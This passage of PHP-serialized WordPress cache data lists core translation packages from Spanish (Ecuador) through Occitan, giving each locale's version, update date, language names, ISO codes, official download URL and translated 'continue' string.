Ecuador\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2.10/es_EC.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_DO\";a:8:{s:8:\"language\";s:5:\"es_DO\";s:7:\"version\";s:6:\"5.8.15\";s:7:\"updated\";s:19:\"2021-10-08 14:32:50\";s:12:\"english_name\";s:28:\"Spanish (Dominican Republic)\";s:11:\"native_name\";s:33:\"Español de República Dominicana\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.8.15/es_DO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_UY\";a:8:{s:8:\"language\";s:5:\"es_UY\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-31 18:33:26\";s:12:\"english_name\";s:17:\"Spanish (Uruguay)\";s:11:\"native_name\";s:19:\"Español de Uruguay\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_UY.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PR\";a:8:{s:8:\"language\";s:5:\"es_PR\";s:7:\"version\";s:6:\"5.4.21\";s:7:\"updated\";s:19:\"2020-04-29 15:36:59\";s:12:\"english_name\";s:21:\"Spanish (Puerto Rico)\";s:11:\"native_name\";s:23:\"Español de Puerto Rico\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.21/es_PR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-12 23:13:43\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_CL.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:6:\"5.2.26\";s:7:\"updated\";s:19:\"2019-03-02 06:35:01\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.2.26/es_GT.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 08:29:09\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-22 09:48:08\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-11-05 21:53:17\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9-RC/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 23:23:42\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"fa_AF\";a:8:{s:8:\"language\";s:5:\"fa_AF\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-02-14 17:29:08\";s:12:\"english_name\";s:21:\"Persian (Afghanistan)\";s:11:\"native_name\";s:31:\"(فارسی (افغانستان\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/fa_AF.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-16 09:58:15\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-20 16:10:31\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 16:47:50\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:6:\"6.5.10\";s:7:\"updated\";s:19:\"2024-02-01 23:56:53\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.5.10/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:3:\"fur\";a:8:{s:8:\"language\";s:3:\"fur\";s:7:\"version\";s:6:\"4.8.29\";s:7:\"updated\";s:19:\"2025-12-20 19:08:53\";s:12:\"english_name\";s:8:\"Friulian\";s:11:\"native_name\";s:8:\"Friulian\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.29/fur.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"fur\";i:3;s:3:\"fur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"fy\";a:8:{s:8:\"language\";s:2:\"fy\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 09:42:29\";s:12:\"english_name\";s:7:\"Frisian\";s:11:\"native_name\";s:5:\"Frysk\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/fy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fy\";i:2;s:3:\"fry\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Trochgean\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 07:59:20\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 07:53:18\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ચાલુ રાખો\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:6:\"4.4.34\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.4.34/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2024-05-04 18:39:24\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2.10/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:6:\"6.4.10\";s:7:\"updated\";s:19:\"2025-02-06 05:17:11\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.4.10/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"जारी रखें\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 07:04:50\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:3:\"hsb\";a:8:{s:8:\"language\";s:3:\"hsb\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2023-02-22 17:37:32\";s:12:\"english_name\";s:13:\"Upper Sorbian\";s:11:\"native_name\";s:17:\"Hornjoserbšćina\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.2.10/hsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"hsb\";i:3;s:3:\"hsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:4:\"Dale\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-08-08 12:55:19\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-07-07 08:33:25\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:6:\"4.9.31\";s:7:\"updated\";s:19:\"2018-12-11 10:40:02\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.31/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-22 09:38:05\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 14:44:55\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"次へ\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:6:\"4.9.31\";s:7:\"updated\";s:19:\"2019-02-16 23:58:56\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.31/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-06 13:51:56\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2023-07-05 11:40:39\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.2.10/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"kk\";a:8:{s:8:\"language\";s:2:\"kk\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2024-07-18 02:49:24\";s:12:\"english_name\";s:6:\"Kazakh\";s:11:\"native_name\";s:19:\"Қазақ тілі\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9-RC/kk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kk\";i:2;s:3:\"kaz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Жалғастыру\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:6:\"5.2.26\";s:7:\"updated\";s:19:\"2019-06-10 16:18:28\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.2.26/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:2:\"kn\";a:8:{s:8:\"language\";s:2:\"kn\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-05-12 09:01:27\";s:12:\"english_name\";s:7:\"Kannada\";s:11:\"native_name\";s:15:\"ಕನ್ನಡ\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/kn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kn\";i:2;s:3:\"kan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"ಮುಂದುವರಿಸು\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 07:01:00\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-17 13:14:48\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/7.1/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"بهردهوام به\";}}s:3:\"kir\";a:8:{s:8:\"language\";s:3:\"kir\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-03-25 22:55:12\";s:12:\"english_name\";s:6:\"Kyrgyz\";s:11:\"native_name\";s:16:\"Кыргызча\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.0.4/kir.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ky\";i:2;s:3:\"kir\";i:3;s:3:\"kir\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Улантуу\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 11:59:39\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-09-27 20:51:17\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"6.9.7\";s:7:\"updated\";s:19:\"2026-02-20 20:55:46\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.7/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:6:\"6.0.14\";s:7:\"updated\";s:19:\"2022-10-01 09:23:52\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.0.14/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 20:02:12\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:6:\"6.5.10\";s:7:\"updated\";s:19:\"2024-06-20 17:22:06\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.5.10/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-05-20 17:07:02\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:6:\"5.5.20\";s:7:\"updated\";s:19:\"2022-03-11 13:52:22\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.5.20/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-06-03 11:12:51\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 17:15:12\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 03:50:37\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 12:27:45\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 21:20:18\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 21:20:58\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/7.1/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-18 10:59:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:6:\"4.8.29\";s:7:\"updated\";s:19:\"2017-08-25 